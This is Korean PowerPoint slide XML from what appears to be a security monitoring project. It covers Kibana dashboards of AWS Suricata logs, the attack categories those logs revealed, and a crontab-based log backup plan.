            <a:ext cx="6107556" cy="4537991"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6863944" y="1774749"/>
            <a:ext cx="4947359" cy="1476104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2" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7652823" y="2029145"/>
            <a:ext cx="2571004" cy="28283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E2E8F0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패스 트래버설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E2E8F0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(Path Traversal)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7199738" y="2481065"/>
            <a:ext cx="4224427" cy="691209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공격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IP 172.16.0.124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가 시도한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9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건의 시스템 파일 접근 공격 패턴을 로그를 통해 최종 식별했습니다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.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6863946" y="3418799"/>
            <a:ext cx="4947359" cy="1249889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38" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7639686" y="3609723"/>
            <a:ext cx="2302562" cy="33360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E2E8F0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Web Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7199738" y="4014039"/>
            <a:ext cx="4401410" cy="46499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172.16.0.17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의 웹 로그인 실패를 포착하여 시각화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882607" y="4836636"/>
            <a:ext cx="4947360" cy="1476104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1" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824275" y="4836636"/>
            <a:ext cx="47292" cy="1476104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D39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2" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7257496" y="5026291"/>
            <a:ext cx="305396" cy="333607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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3" name="Image 6" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7317087" y="5093824"/>
            <a:ext cx="174661" cy="166802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645209" y="5091032"/>
            <a:ext cx="2600057" cy="30758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E2E8F0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ELK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E2E8F0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통합 관제 및 로그 최적화</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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Text 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7218400" y="5541809"/>
            <a:ext cx="4224427" cy="691209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Alpine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전용 경로인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/var/log/messages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를 추적하여 전체 공격의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59.34%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를 차지하는 핵심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IP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를 도출했습니다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.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" 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Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824663" y="3410338"/>
            <a:ext cx="47292" cy="1250589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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8" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7229309" y="3530866"/>
            <a:ext cx="305396" cy="333607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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49" name="Image 6" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298425" y="3607924"/>
            <a:ext cx="174661" cy="166802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210259" y="1940191"/>
            <a:ext cx="305396" cy="333607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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51" name="Image 6" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="-840" r="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7269850" y="2007724"/>
            <a:ext cx="174661" cy="166802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824663" y="1733550"/>
            <a:ext cx="47293" cy="1517303"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D399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111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aws suricata log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시각화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="390449"/>
            <a:ext cx="8572500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Kibana: AWS suricata </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="그림 14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1305" y="1508633"/>
            <a:ext cx="8572500" cy="43550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Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9076279" y="1508633"/>
            <a:ext cx="2735026" cy="2988552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59" name="Image 0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344388" y="1723247"/>
            <a:ext cx="152705" cy="188272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9639968" y="1723247"/>
            <a:ext cx="2190902" cy="34159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확인 가능 리스트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9575772" y="2342122"/>
            <a:ext cx="2505226" cy="3439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전체 이벤트 수</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162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338254" y="2359726"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9575772" y="2713597"/>
            <a:ext cx="2505226" cy="3439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시간대별 활동 유형</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164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338254" y="2731201"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9566635" y="3046778"/>
            <a:ext cx="2505226" cy="3439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주요 호스트 분석</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166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329117" y="3064382"/>
            <a:ext cx="115044" cy="1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55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388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aws suricata log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시각화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="390449"/>
            <a:ext cx="8572500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Kibana: AWS suricata </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="그림 16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1305" y="1467231"/>
            <a:ext cx="7362190" cy="33395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5" name="그림 16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81305" y="4800600"/>
            <a:ext cx="7362190" cy="18137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Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943545" y="1467231"/>
            <a:ext cx="3867760" cy="3128466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0" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8489309" y="2296585"/>
            <a:ext cx="2505226" cy="3439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이벤트 유형 비중</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171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51791" y="2314189"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8489309" y="2668060"/>
            <a:ext cx="2505226" cy="3439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프로토콜 통계</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173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51791" y="2685664"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8498834" y="2972860"/>
            <a:ext cx="2505226" cy="3439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국가별 접속 현황</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175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61316" y="3009514"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Image 0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238875" y="1677710"/>
            <a:ext cx="152705" cy="188272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534455" y="1677710"/>
            <a:ext cx="2190902" cy="34159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확인 가능 리스트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8508359" y="3353860"/>
            <a:ext cx="2505226" cy="3439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상세 이벤트 리스트</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179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70841" y="3371464"/>
            <a:ext cx="115044" cy="115044"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8508359" y="3725335"/>
            <a:ext cx="2505226" cy="3439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호스트 상태 통계</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181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70841" y="3742939"/>
            <a:ext cx="115044" cy="1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04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388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8130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aws suricata rule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94A3B8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탐지 로그 시각화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="390449"/>
            <a:ext cx="8572500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000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-75" normalizeH="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Noto Sans KR"/>
                <a:ea typeface="Noto Sans KR"/>
                <a:cs typeface="Noto Sans KR"/>
              </a:rPr>
              <a:t>Kibana: AWS suricata </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="그림 185"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="47090" t="29140" b="30740"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="117927" y="2896757"/>
            <a:ext cx="7043101" cy="386953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7" name="그림 1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362456"/>
            <a:ext cx="12192000" cy="1442201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312818" y="2988469"/>
            <a:ext cx="4629455" cy="2323364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0" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7312819" y="2988469"/>
            <a:ext cx="38405" cy="2329696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1" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503014" y="3184949"/>
            <a:ext cx="288436" cy="275007"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 73385"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22D3E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2" name="Image 3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80481" y="3245854"/>
            <a:ext cx="133502" cy="171772"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865117" y="3201419"/>
            <a:ext cx="2273198" cy="318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Suricata rules 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탐지 로그 시각화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503013" y="3601438"/>
            <a:ext cx="4133450" cy="105453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ko-KR" altLang="en-US" sz="1050" b="1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탐지 공격 종류</a:t>
            </a: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en-US" altLang="ko-KR" sz="1050" b="1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050" b="1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050" b="1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SSH Brute Force Attempt</a:t>
            </a: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en-US" altLang="ko-KR" sz="1050" b="1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- Directory Traversal Attempt</a:t>
            </a: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en-US" altLang="ko-KR" sz="1050" b="1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- SQL Injection Attempt</a:t>
            </a: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en-US" altLang="ko-KR" sz="1050" b="1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- XSS Script Tag Attempt</a:t>
            </a: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en-US" altLang="ko-KR" sz="1050" b="1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- Log4j RCE ATTEMPT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535438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571500" y="838505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데이터 무결성 확보를 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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로그 백업</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1257300"/>
            <a:ext cx="571500" cy="3840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571500" y="1371905"/>
            <a:ext cx="5296205" cy="2419350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 181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85977" y="1524229"/>
            <a:ext cx="152705" cy="15939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86054" y="1895551"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133856" y="1895094"/>
            <a:ext cx="2610612" cy="28184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웹 서버 로그 백업</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114654" y="2171929"/>
            <a:ext cx="2629814" cy="28184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suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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로그 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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로그 벡업</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="3791407"/>
            <a:ext cx="5296205" cy="2971495"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 705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23544" y="3972001"/>
            <a:ext cx="152705" cy="152705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809244" y="4524451"/>
            <a:ext cx="4819802" cy="705002"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14022"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="323698"/>
            <a:ext cx="3743554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vSphere 기반 백업 전략</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="1504798"/>
            <a:ext cx="2190902" cy="34159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주요 백업 대상 (Targets)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304849" y="3905250"/>
            <a:ext cx="1534363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방식</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="4228871"/>
            <a:ext cx="2301545" cy="191109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백업 방식 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</a:t>
            </a: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기밀 서버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,</a:t>
            </a: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사내 게시판 서버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</a:t>
            </a:r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33602" y="4654982"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4647895"/>
            <a:ext cx="415138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Daily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324905" y="1362380"/>
            <a:ext cx="5286146" cy="5400522"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 248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Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6334049" y="1943024"/>
            <a:ext cx="5277002" cy="9144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 rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="-840" b="-840"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6486754" y="1514627"/>
            <a:ext cx="190195" cy="171907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752844" y="1524229"/>
            <a:ext cx="206288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백업 경로 및 리커버리 흐름</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Image 1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95579" y="2181301"/>
            <a:ext cx="133502" cy="164596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923544" y="4934330"/>
            <a:ext cx="4484390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매일 오전 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6</a:t>
            </a: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 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crontab</a:t>
            </a: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을 이용한 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LOG</a:t>
            </a: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받아오는 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SCRIPT </a:t>
            </a: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자동 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799719" y="5731628"/>
            <a:ext cx="4819802" cy="755049"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 14022"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="E5E7EB"/>
            </a:solidFill>
            <a:prstDash val="soli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7" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="799719" y="5409971"/>
            <a:ext cx="2301545" cy="17033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백업 방식 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(AWS </a:t>
            </a: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서버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</a:t>
            </a:r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24077" y="5883707"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133475" y="5876620"/>
            <a:ext cx="415138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Daily</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914019" y="6163055"/>
            <a:ext cx="4484390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매일 오전 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9</a:t>
            </a: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 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crontab</a:t>
            </a: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을 이용한 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</a:t>
            </a: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서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="52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백업 서버 로그 전송 스크립트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486754" y="2133219"/>
            <a:ext cx="704382" cy="527606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7591628" y="3400577"/>
            <a:ext cx="2781810" cy="10479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4" name="가로 글상자 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8182939" y="3041827"/>
            <a:ext cx="1598272" cy="366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172.16.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="55" name="선 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815654" y="2666608"/>
            <a:ext cx="227339" cy="498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가로 글상자 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8319557" y="3782263"/>
            <a:ext cx="994834" cy="635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backup server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
